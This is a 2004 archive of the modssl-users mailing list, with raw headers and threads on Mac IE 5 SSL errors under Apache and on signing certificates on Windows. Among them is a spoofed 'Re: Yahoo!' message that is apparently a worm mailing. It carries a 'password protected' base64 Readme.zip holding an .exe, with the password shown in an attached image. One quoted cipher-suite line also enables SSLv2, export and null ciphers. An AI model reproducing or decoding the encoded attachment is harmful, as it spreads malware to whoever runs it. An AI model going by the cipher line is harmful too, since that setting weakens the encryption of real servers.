Subject: Re: Mac IE 5 ssl errors
Message-ID: <20040326172354.GC20700@ucar.edu>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
In-Reply-To: 
User-Agent: Mutt/1.4.1i
X-MailScanner: Found to be clean
X-MailScanner-SpamCheck: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Burkholder 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

What's the underlying OS?

SSL Session caching just doesn't seem to work on older Linuxes is what I've
discovered, and falling back to SSL2 is one thing.

Another is the Mac IE is very picky and may crap out if a page includes
non-SSL content.

P.
On Fri, Mar 26, 2004 at 12:14:43PM -0500, Randall Perry wrote:
>=20
> Just noticed that Mac IE 5 is having problems with ssl connections to my
> apache 1.3.29 server. I either get the 'Security failure. Data decryption
> error,' or it'll connect but graphics won't load on https pages, and I get
> this error in httpd error.log:
>=20
> [Fri Mar 26 12:05:06 2004] [error] mod_ssl: SSL handshake interrupted by
> system [Hint: Stop button pressed in browser?!] (System error follows)
> [Fri Mar 26 12:05:06 2004] [error] System: Connection reset by peer (errn=
o:
> 54)
>=20
> Found these changes to httpd.conf on searching the list, and implemented
> them, but to no avail. Anyone got a solution?
>=20
> >=20
> > I just solved it. Do not use an SSLProtocol line. Comment out the
> > SetEnvIf line that does nokeepalive for MSIE. Use the following
> > instead.
> >=20
> > BrowserMatch "MSIE [1-4]" nokeepalive ssl-unclean-shutdown \
> >        downgrade-1.0 force-response-1.0
> > BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown
> >=20
> > I'm also using this cipher suite line, but the default might work, too:
> >=20
> > SSLCipherSuite=20
> > !EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+ME=
DIUM:
> > +LOW:+SSLv2:+EXP:+eNULL
>=20
> --=20
> Randall Perry
> sysTame
>=20
> Xserve Web Hosting/Co-location
> Website Development/Promotion
> Mac Consulting/Sales
>=20
> http://www.systame.com/
>=20
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-------------------------------------------+-----------------------------+
|Peter Burkholder, System Administrator    |                             |
|Digital Library for Earth System Education| Email)  peterb@ucar.edu     |
|DLESE=AE -- http://www.dlese.org            | Office) +1-303-497-2663     |
|DLESE Program Center (DPC)                | Fax)    +1 303-497-8336     |
|UCAR/DPC, P.O. Box 3000                   | Pager)  +1-303-201-1284     |
|Boulder, CO 80307-3000                    | or peterb-page@dpc.ucar.edu |
|                                                                    |
|                              ~~~  ~~  ~~~   __o                        |
|                            ~~~  ~~~ ~~    _`\<,_                       |
|                       ~~~ ~~~   ~~~~     (*)/ (*)                 |
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 26 18:33:50 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AB5ACA897C; Fri, 26 Mar 2004 18:33:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from indigo.quadrant.net (indigo.quadrant.net [207.195.92.9])
	by master.modssl.org (Postfix) with ESMTP id CA1DDA8958
	for ; Fri, 26 Mar 2004 18:33:32 +0100 (CET)
Received: from [192.168.100.122] (production.marketingden.com [204.83.38.3])
	by indigo.quadrant.net (8.12.10/8.12.10) with ESMTP id i2QHXQGv009060
	for ; Fri, 26 Mar 2004 11:33:28 -0600 (CST)
User-Agent: Microsoft-Entourage/9.0.2.4011
Date: Fri, 26 Mar 2004 11:33:13 -0600
Subject: Re: Mac IE 5 ssl errors
From: James Hastings-Trew 
To: 
Message-ID: 
In-Reply-To: <20040326172354.GC20700@ucar.edu>
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Hastings-Trew 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>> Just noticed that Mac IE 5 is having problems with ssl connections to my
>> apache 1.3.29 server. I either get the 'Security failure. Data decryption
>> error,' or it'll connect but graphics won't load on https pages, and I get
>> this error in httpd error.log:
>> 
>> [Fri Mar 26 12:05:06 2004] [error] mod_ssl: SSL handshake interrupted by
>> system [Hint: Stop button pressed in browser?!] (System error follows)
>> [Fri Mar 26 12:05:06 2004] [error] System: Connection reset by peer (errno:
>> 54)
> 
> What's the underlying OS?
> 
> SSL Session caching just doesn't seem to work on older Linuxes is what I've
> discovered, and falling back to SSL2 is one thing.
> 
> Another is the Mac IE is very picky and may crap out if a page includes
> non-SSL content.

I dunno, it sounds exactly like the errors I got with my RH7 server till I
put a session cache in:

SSLSessionCache dbm:/var/cache/httpd/ssl_cache
SSLSessionCacheTimeout 300

Just before the final  tag in httpd.conf

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 26 19:01:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 918C7A898B; Fri, 26 Mar 2004 19:01:53 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from kinetic-tech.com (mail.pdidesign.com [64.207.47.44])
	by master.modssl.org (Postfix) with ESMTP id 83C18A893A
	for ; Fri, 26 Mar 2004 19:01:34 +0100 (CET)
Received: from kinetic-tech.com [209.180.246.58] by kinetic-tech.com with ESMTP
  (SMTPD32-8.05) id A057380020; Fri, 26 Mar 2004 11:03:03 -0700
Message-ID: <40646FFB.50203@kinetic-tech.com>
Date: Fri, 26 Mar 2004 11:01:31 -0700
From: support 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: openssl-users@openssl.org, modssl-users@modssl.org
Subject: Creating my own CA
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: support 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've got OpenSA (Apache w/openssl+modssl) running on a Windows platform
and am trying to create my own CA. I'm able to create a private key and
make a cert for that CA but can't use my CA to sign the CSR.

I see from the modssl docs the step by step but then the last step gets
to running the script sign.sh and, well, obviously Windows has some
problems running a .sh file. Every place I see on line mentions that
there's some strange requirements of the "openssl ca" command. Does
anyone know of some other approach to sign the CSR.

I've been messing with CygWin and Mac OSx and a few other things but it
seems like an awful lot of trouble to go through if I have to actually
'build' a *nix server just to sign my server cert.

Any help is always appreciated.

Kevin Ericson
Kinetic Technologies, Inc.




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 27 16:28:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C677EA8966; Sat, 27 Mar 2004 16:28:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rwcrmhc13.comcast.net (rwcrmhc13.comcast.net [204.127.198.39])
	by master.modssl.org (Postfix) with ESMTP id 22EDBA8943
	for ; Sat, 27 Mar 2004 16:27:55 +0100 (CET)
Received: from [192.168.1.10] (c-65-34-209-141.se.client2.attbi.com[65.34.209.141])
          by comcast.net (rwcrmhc13) with SMTP
          id <20040327152750015007m199e>; Sat, 27 Mar 2004 15:27:50 +0000
User-Agent: Microsoft-Entourage/10.1.4.030702.0
Date: Sat, 27 Mar 2004 10:27:48 -0500
Subject: Re: Mac IE 5 ssl errors
From: Randall Perry 
To: 
Message-ID: 
In-Reply-To: <20040326172354.GC20700@ucar.edu>
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Randall Perry 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

on 3/26/04 12:23 PM, Peter Burkholder at peterb@ucar.edu wrote:

> What's the underlying OS?
Mac OS X Server 10.3.2

> 
> SSL Session caching just doesn't seem to work on older Linuxes is what I've
> discovered, and falling back to SSL2 is one thing.
> 
> Another is the Mac IE is very picky and may crap out if a page includes
> non-SSL content.
This must be a server-side config issue as I don't have problems connecting
to most secure sites running apache with Mac IE.


-- 
Randall Perry
sysTame

Xserve Web Hosting/Co-location
Website Development/Promotion
Mac Consulting/Sales

http://www.systame.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 27 16:28:39 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 29DF7A89A3; Sat, 27 Mar 2004 16:28:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [204.127.198.35])
	by master.modssl.org (Postfix) with ESMTP id CEDFBA898B
	for ; Sat, 27 Mar 2004 16:28:22 +0100 (CET)
Received: from [192.168.1.10] (c-65-34-209-141.se.client2.attbi.com[65.34.209.141])
          by comcast.net (rwcrmhc11) with SMTP
          id <20040327152818013002u2k5e>; Sat, 27 Mar 2004 15:28:18 +0000
User-Agent: Microsoft-Entourage/10.1.4.030702.0
Date: Sat, 27 Mar 2004 10:28:16 -0500
Subject: Re: Mac IE 5 ssl errors
From: Randall Perry 
To: 
Message-ID: 
In-Reply-To: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Randall Perry 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

.
> 
> I dunno, it sounds exactly like the errors I got with my RH7 server till I
> put a session cache in:
> 
> SSLSessionCache dbm:/var/cache/httpd/ssl_cache
> SSLSessionCacheTimeout 300
> 
> Just before the final  tag in httpd.conf
Got that in my config also.


-- 
Randall Perry
sysTame

Xserve Web Hosting/Co-location
Website Development/Promotion
Mac Consulting/Sales

http://www.systame.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 27 18:32:32 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C0DC0A898B; Sat, 27 Mar 2004 18:32:32 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from da06.net (66-146-163-133.skyriver.net [66.146.163.133])
	by master.modssl.org (Postfix) with SMTP id 92136A8966
	for ; Sat, 27 Mar 2004 18:32:21 +0100 (CET)
Date: Sat, 27 Mar 2004 09:32:17 -0800
To: modssl-users@modssl.org
Subject: Re: Yahoo!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------kumowrixmndpcsuqlxqg"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------kumowrixmndpcsuqlxqg
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


See  attach.





For security reasons  attached file  is password  protected. The password  is 





----------kumowrixmndpcsuqlxqg
Content-Type: image/jpeg; name="qgsrnqowbr.jpeg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="qgsrnqowbr.jpeg"
Content-ID: 

/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRof
Hh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwh
MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAAR
CAASADgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAA
AgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK
FhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWG
h4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl
5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREA
AgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYk
NOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOE
hYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk
5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD3+qWp37afbGZbdpgAzNg4CqoJJJ/DA9SR
V2sLWtTiS4WxkaIwFf8ASFE8aufRMM64BHU+n1zWGJqezpt3szOrLlje5afWEaSKO2iEruiS
FWcRkK/TGep4JxxwKk/tPfqP2WGJZAj7JW8wKVOM5Cn7wGRnHr35rnLv7HdXN4Vv7WNL1bfD
/aowbcIQWHDdeOMZGaen2MX7Z1O0Cf2j9t84XScrtICdc9ePTHeuD63U5rX6+Xd/no7+fQ5/
bTub0V9dnUUtJra3UlDIxjnZyi9BkFB1PHXsfSnaffTX7Sv5EaW6yPGriUlmKtjO3aAAcHvW
dZ6jZrd6ldSX9kkssgSHfcIQUVflPB6ZLH1pNEaKbUnniltIybZUkt7aRCGcMS0mFJ45AGee
ea2hXk5xXNe7fbbp0+fzLjUbaV+50NFFFegdIUUUUAFFFFABRRRQAUUUUAf/2Q==

----------kumowrixmndpcsuqlxqg
Content-Type: application/octet-stream; name="Readme.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Readme.zip"

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
